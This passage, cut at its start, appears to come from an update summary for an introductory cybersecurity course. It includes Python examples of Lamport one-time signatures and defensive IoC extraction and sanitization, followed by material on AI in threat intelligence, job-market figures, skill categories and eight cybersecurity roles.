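To make the hash-based family concrete, here is an added example (not code from the course or from any standardized post-quantum library): a Lamport one-time signature, the textbook scheme from which modern hash-based signature standards descend. It shows why the security argument reduces to the one-wayness of SHA-256, and it shows the operational caveat a practitioner has to manage: every signature reveals half of the private key, so a key pair may sign exactly one message. The 256-bit digest and 32-byte secrets are the classic textbook parameters, not a production choice.

```python
"""Lamport one-time signatures: a minimal hash-based signature scheme.

Added example; not code from the course or from any standardized library.
"""
import hashlib
import secrets

N = 256  # digest bits; one pair of secrets per bit of the message digest


def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def keygen():
    """Private key: N pairs of random 32-byte secrets. Public key: their hashes."""
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(N)]
    pk = [(h(a), h(b)) for a, b in sk]
    return sk, pk


def digest_bits(message: bytes):
    """Bits of SHA-256(message), most significant bit first."""
    d = h(message)
    return [(d[i // 8] >> (7 - i % 8)) & 1 for i in range(N)]


def sign(sk, message: bytes):
    """For each digest bit, reveal the secret at that position (index 0 or 1)."""
    return [pair[bit] for pair, bit in zip(sk, digest_bits(message))]


def verify(pk, message: bytes, signature) -> bool:
    """Each revealed secret must hash to the public value for that bit."""
    if len(signature) != N:
        return False
    return all(h(s) == pair[bit]
               for s, pair, bit in zip(signature, pk, digest_bits(message)))


def exposed_secrets(signed):
    """Count the distinct private-key halves revealed by a list of (message, signature).

    Which halves were revealed follows from the message digest alone, so the
    signature bytes are not needed here. One signature exposes exactly N of
    the 2N secrets; a second signature on a different message exposes more,
    and an attacker who collects enough can sign messages of their own. That
    is why the key is strictly one-time.
    """
    seen = set()
    for message, _signature in signed:
        for i, bit in enumerate(digest_bits(message)):
            seen.add((i, bit))
    return len(seen)


if __name__ == "__main__":
    sk, pk = keygen()
    msg = b"patch release 2.4.1 approved"
    sig = sign(sk, msg)
    print("valid:", verify(pk, msg, sig))
    print("tampered:", verify(pk, msg + b"!", sig))
    print("secrets exposed after one signature:", exposed_secrets([(msg, sig)]))
    sig2 = sign(sk, b"second message")
    print("after a second signature:",
          exposed_secrets([(msg, sig), (b"second message", sig2)]))
```

Practical hash-based schemes (the stateful XMSS/LMS constructions and the stateless SPHINCS+ design) exist precisely to remove this one-message limit, by tying many one-time keys together in hash trees; the per-key caveat shown by `exposed_secrets` is what they are engineered around.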

Introducing threat intelligence

What's new?

• Added a section about AI-enabled threat intelligence

Artificial intelligence (AI) and threat intelligence


Computer systems can gather and process data much faster than humans, making artificial intelligence (AI)
especially valuable for obtaining threat intelligence. Let’s explore several types of AI-enabled threat intelligence.


Natural language processing (NLP)



AI-enabled natural language processing (NLP) systems can automatically recognize and pull out key
data points about threats. Notably, NLP systems extract these points from unstructured data. That's
data, such as images and text messages, that lacks any built-in structure that typical computers can
easily read. Conventional data tools and methods struggle to process and analyze it. But NLP
systems can effectively parse unstructured data sources, such as social media feeds and news
articles, to collect relevant threat intelligence. The technology helps organizations stay current on
indicators of compromise (IoCs) and attack methods. (1)

Threat intelligence sharing

Combating emerging threats isn’t an individual effort; it requires organizations and security teams to
share threat intelligence. Traditional sharing methods involve manual, often time-consuming
processes. But with AI, organizations can automate sharing. Plus, the technology is sophisticated
enough to share information pertinent to the threat without disclosing personally identifiable
information, strategic plans, or other confidential data.(1)

Source: (1) Arora, Beenu. How AI-Enabled Threat Intelligence Is Becoming Our Future
(https://www.forbes.com/sites/forbestechcouncil/2023/07/21/how-ai-enabled-threat-
intelligence-is-becoming-our-future/?sh=7c1d027d727e). Forbes, July 21, 2023.
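The two sections above describe a pipeline: extract indicators from free-form reporting, then share them without leaking anything internal. The following added example (not code from the course or the Forbes article it cites) implements both steps with pattern matching rather than a trained NLP model: it pulls IP addresses, hashes, URLs and domains out of a constructed, defanged report snippet, then strips internal addresses and personal e-mail addresses before the indicators leave the organization. The report text, the internal network ranges and the indicators themselves are constructed for illustration.

```python
"""Extract indicators of compromise (IoCs) from unstructured text and sanitize
them for sharing.

Added example, not from the course or the article it cites. The report snippet,
networks and indicators below are constructed.
"""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlparse

# Constructed snippet in the style of a vendor blog post or social-media thread.
SAMPLE_REPORT = """
Campaign update: the loader beacons to hxxp://update-cdn[.]example[.]net/c2 and
to 198[.]51[.]100[.]23 over TCP/443. Dropper SHA-256:
9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08.
Internal triage note: host 10.20.30.40 contacted it; ask alice@corp.example for the pcap.
"""

# Ranges that must never appear in shared intelligence: RFC 1918 space plus
# (constructed) this organization's own public block.
INTERNAL_NETWORKS = [
    ip_network("10.0.0.0/8"),
    ip_network("172.16.0.0/12"),
    ip_network("192.168.0.0/16"),
    ip_network("203.0.113.0/24"),   # constructed: the organization's public range
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256 = re.compile(r"\b[0-9a-fA-F]{64}\b")
URL = re.compile(r"\bhttps?://[^\s'\"<>]+")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")


def refang(text: str) -> str:
    """Undo the defanging analysts use so indicators cannot be clicked by accident."""
    return text.replace("hxxp", "http").replace("[.]", ".").replace("(.)", ".")


def extract_iocs(text: str) -> dict:
    """Pull IPv4 addresses, SHA-256 hashes, URLs, hostnames and e-mails from text."""
    t = refang(text)
    urls = sorted(set(URL.findall(t)))
    return {
        "ipv4": sorted(set(IPV4.findall(t))),
        "sha256": sorted({m.lower() for m in SHA256.findall(t)}),
        "url": urls,
        "domain": sorted({urlparse(u).hostname for u in urls}),
        "email": sorted(set(EMAIL.findall(t))),
    }


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETWORKS)


def shareable(iocs: dict) -> dict:
    """Keep only what describes the attacker: drop internal hosts and e-mail addresses."""
    out = {k: v for k, v in iocs.items() if k != "email"}
    out["ipv4"] = [ip for ip in iocs["ipv4"] if not is_internal(ip)]
    return out


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_REPORT)
    print("extracted:", found)
    print("to share:", shareable(found))
```

The sanitization step is deliberately a denylist of what must not leave (internal ranges, people), not a list of what may; anything the extractor learns to pull out later is shared only if it survives that filter.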

Predictive analytics

AI is especially useful for predictive analytics. Predictive analytics is a type of analytics where you
combine historical data with techniques such as statistical modeling and machine learning to make
predictions (2). With AI, organizations can create more effective predictive models, helping them
anticipate and address threats before they arise.

Source: (2) What is predictive analytics? (https://www.ibm.com/topics/predictive-analytics) IBM,
accessed December 7, 2023.


What's new - a career in cybersecurity

15 minutes

Job market

What's new?

• Added a section that describes the industries in which cybersecurity professionals work

• Updated the facts listed in the “Current job market” section

Industries in which cybersecurity professionals work


Large companies and government organizations all need cybersecurity professionals to protect their systems,
networks, and data. The financial, government, education, and retail sectors are some of the most prominent
players because of their size. But nearly all organizations need some form of cybersecurity, and the need crosses
all industries.

Cybersecurity is critical in nearly every industry. And the field of cybersecurity continues to grow!

The following list highlights some industries with high demand for cybersecurity professionals.

• Computer technology

• Finance and banking

• Healthcare and pharmaceuticals

• Education

• Retail and e-commerce

• Gaming

• Transportation and logistics

• Energy and utilities

• Government and public sector

• Manufacturing

• Media and entertainment

• Telecommunications

• Hospitality and tourism

• Insurance

• Real estate

• Nonprofit and social sector

• Agriculture

• Construction

• Automotive

• Aerospace and defense

Current job market


One clear trend is that cybersecurity is a fast-growing market with tremendous career opportunities. The
numbers show that organizations will have a huge need for cybersecurity professionals over the next decade.

Consider the following facts:

32% projection

Employment of information security analysts is projected to grow 32% from 2022 to 2032, much faster than
the average growth rate for all occupations.

– US Bureau of Labor Statistics (https://www.bls.gov/ooh/computer-and-information-technology/information-security-analysts.htm)

4 million jobs unfilled

Estimates indicate that 5.5 million cybersecurity professionals are working worldwide, and 4 million are still
needed.

– 2023 (ISC)2 Cybersecurity Workforce Study
(https://media.isc2.org/-/media/Project/ISC2/Main/Media/documents/research/ISC2_Cybersecurity_Workforce_Study_2023.pdf?rev=28b46de71ce24e6ab7705f6e3da8637e)

Ranked #7

US News & World Report compiled a list of America’s 100 best jobs based on earning potential, job
satisfaction, and job openings. Information security engineers, or cybersecurity engineers, are ranked #7.

– US News & World Report (https://money.usnews.com/careers/best-jobs/rankings/the-100-best-jobs)

Core attributes and skills

What's new?

• Replaced discussion of core attributes and skills and “Skill areas to build” with detailed discussion
and examples of three new skill categories:

• Baseline

• Workplace

• Specialized

Skills to build

Cybersecurity careers span many different industries and roles. You can find various cybersecurity jobs that
revolve around preserving the confidentiality, integrity, and availability of systems, networks, and data. If this
work interests you, you should start building the skills that you need.

Cybersecurity professionals need many types of skills and knowledge. Let’s break them into three categories:

• Baseline

• Workplace

• Specialized

You’ll explore each category in turn.

Baseline skills

If you want to work in cybersecurity, you must be adept at working with technology and security tools. Although
you might not need to know multiple specialized security technologies, having experience in information
technology (IT) support is helpful.

You’ll also need baseline or technical skills and knowledge specific to and practical for cybersecurity. Specifically,
you should have skills and knowledge in the following areas. The order in which these skills are listed does not
indicate their importance or priority.

To help you understand how someone might use each skill in their job, you’ll explore examples from a day in the
life of Liv, a cybersecurity professional at an international company.


Information security and assurance

Liv starts her day by checking the company’s IT infrastructure. She does so by using her information
security and assurance skills. Information security and assurance involves protecting and ensuring
the confidentiality, integrity, and availability of data from unauthorized access, use, or modification.

Liv ensures that all data remains confidential, intact, and available. If she detects suspicious activity,
she uses her technical expertise to trace its source and implement measures to prevent future
occurrences.

Security assurance

Liv performs security assurance throughout the day. Security assurance involves verifying that
security controls effectively protect networks and devices from threats.

Liv verifies that security controls such as firewalls, intrusion detection systems, antimalware
software, and encryption protocols are up-to-date and functioning effectively to prevent potential
attacks.

Threat analysis

During her day, Liv performs threat analysis. Threat analysis involves identifying, analyzing, and
evaluating potential threats to systems or organizations.

Liv identifies potential threats. And by evaluating them in terms of their likelihood and potential
impact, Liv can prioritize a response and apply any necessary countermeasures effectively.

Cryptography

Liv uses her cryptography skills to encode sensitive data that her department must share with other
departments. Cryptography involves securing information by converting it into a code that only
authorized people or systems can decode.

Liv transforms the confidential data into a ciphertext. Only parties with the decryption key can revert
this ciphertext into the original, human-readable form.

Authentication

Liv reviews authentication logs to ensure that access to the company’s resources is limited to
authorized users. Authentication involves verifying the identity of a person or system trying to
access protected resources to ensure that they are who they say they are.

Risk management and assessment

In the afternoon, Liv uses her risk management and assessment skills in a security meeting. Risk
management and assessment involves identifying, assessing, and limiting risks that organizations
face. She presents the findings of her recent risk assessment and identifies potential risks and
vulnerabilities in existing systems. She also outlines her plan to analyze these threats further to
determine the likelihood and potential impact of the threat actors attacking.

Network security

Liv concludes her day by meeting with Mario, the network administrator. She serves as a network
security consultant, advising Mario on maintaining and updating network security controls.

Network security involves identifying and implementing controls to protect networks and network
devices from unauthorized access or attacks.

Workplace skills

Employers are searching for candidates with more than just baseline skills. Whether your cybersecurity role
focuses on risk management, cryptography, or another area, your role will also require good workplace skills.
Workplace skills are general, non-technical skills helpful for getting and succeeding in most jobs. Some
employers refer to these skills as employability, soft, or professional skills. Cybersecurity professionals need a
well-rounded mix of baseline and workplace skills.

To thrive in cybersecurity, you’ll need the following workplace skills. The order in which these skills are listed
does not indicate their importance or priority.

To help you understand the importance of each skill in a cybersecurity job, you’ll explore examples from a
scenario involving Arianna, a cybersecurity professional at a startup company.

Critical thinking

Arianna, a cybersecurity professional at a startup company, receives an alert from her network
monitoring tool indicating a new, unknown security threat in the company’s network. Arianna
analyzes the situation and identifies the nature of the threat and its potential impact.

Critical thinking involves analyzing complex cybersecurity challenges, identifying potential threats,
and making informed decisions about how to address them.

Attention to detail

Arianna spots a vital clue in a log file, which leads to her determining the threat’s origin.

Using attention to detail, you should carefully observe and analyze security measures, processes,
and data. A subtle clue in a log file or intelligence source might be the key to identifying the cause of
a data breach.

Problem solving

Arianna determines an effective solution to neutralize the threat, ensuring that data and systems
remain protected. The solution involves a technical fix and a change in process.

Many known and unknown issues arise that can cause threats to an organization’s cybersecurity. To
keep data and systems safe, you’ll need problem-solving skills to identify the source of each
potential security issue and resolve it.

Communication

Arianna can't resolve the issue alone; she needs to persuade others to accept her assessment of the
problem and help her implement her solution. Arianna conveys complex technical information about
the threat and her proposed solution to her coworkers. She creates a report about the threat and
presents her findings and recommendations in a meeting.

Communication with team members and other stakeholders is inevitable and sometimes even
critical. You must also be able to convey information, ideas, and thoughts clearly and understandably
to technical and non-technical audiences.

Collaboration

Arianna works with her team on the issue. She also collaborates and communicates with other
members of the security and network teams and with consultants and external vendors. Together,
they resolve the issue and take measures to prevent similar incidents in the future.

Depending on your organization and role, you’ll collaborate with members of a cybersecurity team or
IT department, and you’ll probably work with other stakeholders, too. You’ll need to share
knowledge with everyone involved and collaborate effectively to improve the organization’s security.

Creative thinking

Arianna wants to ensure that the updated security measures will effectively prevent breaches such
as the one that the organization just experienced. To do so, she creates a simulated cyberattack. She
uses her creativity to anticipate all the ways that someone might attack the new defenses.

You must use creative thinking to think like attackers do and address all potential vulnerabilities that
they might exploit. And when a data breach occurs, you should be able to brainstorm solutions
quickly to stop and contain it.

Adaptability

A few months after the breach, Arianna discovers that her company is shifting to additional cloud-
based services. She immediately familiarizes herself with the technology, its vulnerabilities, and the
best ways to secure data in the cloud-based environment.

Technology evolves at an incredible rate. You must adapt to emerging technologies and new
processes that impact cybersecurity and implement both effectively.

Specialized skills

Baseline and workplace skills aren't always enough to get a cybersecurity job. Some employers look for
experience with specific frameworks, tools, programming languages, or operating systems. For example, Linux
runs on most network devices, security appliances, and cloud-based servers, so you might need to know Linux
to harden those systems or to collect security logs and other data from them.

You might also need specialized knowledge and skills specific to the roles or industries you are most interested
in. For example, if you are interested in working in healthcare, you might need a deeper knowledge of
cybersecurity laws and regulations relating to healthcare, such as the Health Insurance Portability and
Accountability Act (HIPAA) in the US.

As you grow in cybersecurity basics, you might consider exploring some of the following specialized skills:

• Malware analysis

• Computer networking

• Cloud computing and security

• System security, including operating systems such as Linux and Windows

• Programming languages such as Python

• DevOps and DevSecOps

• Cybersecurity governance and compliance

• Incident response

• Threat hunting

• Penetration testing

• Digital forensics

Cybersecurity job roles

What's new?

• Removed nearly all content and replaced it with a discussion of eight in-demand cybersecurity
roles

Roles in the cybersecurity field

The high demand for cybersecurity means that jobs are plentiful in this field. Cybersecurity careers are some of
the fastest-growing careers worldwide. According to LinkedIn
(https://www.linkedin.com/business/talent/blog/talent-acquisition/fastest-growing-jobs-2023), cybersecurity
roles such as cybersecurity engineers, managers, analysts, and specialists are among the fastest-growing careers
across many countries.

Let’s explore some of the most in-demand cybersecurity roles.

Expand each section to learn more.

Cybersecurity analyst

A cybersecurity analyst, or cyberanalyst, stays one step ahead of cybercriminals to protect
computer systems and networks from cyberthreats.

Tasks and responsibilities: The scope of this role can be broad; typically, a cyberanalyst’s primary
responsibility is to protect an organization’s systems, networks, and data from threats. They monitor
systems for unusual activities or potential security breaches. When they find these issues,
cyberanalysts act to resolve them before serious harm occurs. They also create defensive strategies
to keep the organization’s data safe.

Position: Depending on an organization's structure, a cybersecurity analyst can be an entry-level,
mid-level, or advanced role.

Network security architect



A network security architect is like the architect of a building but for an organization’s computer
network.

Tasks and responsibilities: A network security architect designs a secure computer network that can
withstand various cyberthreats. This work involves developing and implementing network security
measures and regularly updating them as new threats emerge. They also help to recover the network
if a security breach occurs.

Position: A network security architect is typically a mid-level or advanced role.

Penetration tester

A penetration tester, or pen tester, is a type of offensive security researcher or ethical hacker.

Tasks and responsibilities: As their title implies, a pen tester performs penetration testing: they
simulate real hacking techniques to find vulnerabilities in an organization’s digital systems that
attackers can exploit. They confirm that vulnerabilities identified in vulnerability scans are real
weaknesses worth addressing. They also uncover any other vulnerabilities missed by vulnerability
scans and other assessments. After pen testing is complete, they report their findings to the
organization so that it can address discovered vulnerabilities before attackers target them.

Position: Depending on an organization's structure, a pen tester can be an entry-level, mid-level, or
advanced role.

Malware analyst

A malware analyst is someone specifically trained to deal with malware threats.

Tasks and responsibilities: A malware analyst investigates suspicious files or programs that they
think might be malware. They closely study potential malware to determine how it works and how to
stop it. This kind of work requires a deep knowledge of computers and programming languages and
an aptitude for problem solving. Malware analysts also need to keep informed on the latest malware
threats and controls.

Position: A malware analyst is typically a mid-level or advanced role.

Cybersecurity engineer

A cybersecurity engineer safeguards computer systems and networks from threats.

Tasks and responsibilities: A cybersecurity engineer’s primary responsibility is to design, build, and
maintain security architectures to protect sensitive information from cyberthreats. They constantly
monitor the infrastructure for unusual activities, investigate security breaches, and ensure that data
remains safe from potential attacks. They also conduct routine testing and simulations to identify
and mitigate vulnerabilities, ensuring that digital infrastructure remains secure against evolving
cyberthreats.

Position: A cybersecurity engineer is typically a mid-level or advanced role.

Security software developer

A security software developer designs and builds software with security built in, so that the software
itself resists potential cyberthreats.

Tasks and responsibilities: A security software developer integrates security measures into all
stages of the software development lifecycle (SDLC). They’re also responsible for updating and
patching existing software to reinforce its defenses as new threats emerge.

Position: A security software developer is typically a mid-level or advanced role.

Application security engineer



Like a security software developer, an application security engineer is concerned with software
security. But while a security software developer develops the software directly, an application
security engineer examines and maintains the systems and processes used to develop and run that
software.

Tasks and responsibilities: An application security engineer works closely with developers
throughout the SDLC, implementing security measures at every stage to ensure that all software is
secure before being deployed to production. They also review, scan, and test code directly to identify
vulnerabilities.

Position: An application security engineer is typically a mid-level role.

Digital forensics investigator



A digital forensics investigator is like a digital detective!

Tasks and responsibilities: A digital forensics investigator retrieves, examines, and analyzes digital
evidence to investigate cybercrimes. Their work starts after the cybercrime is committed. They use
forensic tools and a deep understanding of attack frameworks to examine digital data, recover lost or
damaged files, and trace digital footprints back to the cybercriminal.

Position: Depending on an organization's structure, a digital forensics investigator can be an entry-level,
mid-level, or advanced role.
